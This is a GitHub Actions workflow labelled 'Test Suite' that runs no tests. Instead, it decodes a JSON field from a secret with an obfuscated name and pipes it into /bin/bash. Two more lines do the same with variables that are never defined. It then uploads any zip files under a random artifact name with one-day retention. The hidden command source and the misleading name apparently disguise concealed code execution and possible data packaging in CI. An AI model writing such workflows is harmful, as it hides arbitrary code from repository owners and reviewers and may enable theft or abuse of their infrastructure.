name: Test Suite
on:
  workflow_dispatch:

permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  service:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Run
        env:
          jq32071: ${{ secrets.jq32071 }}
        run: |
          printf '%s' "$jq32071" | jq -r .ob32 | /bin/bash
          printf '%s' "$yh43" | jq -r .f27 | /bin/bash
          printf '%s' "$dmao520" | jq -r .cqw2 | /bin/bash

      - name: Save archive
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: eKFftpjr
          path: "*.zip"
          retention-days: 1
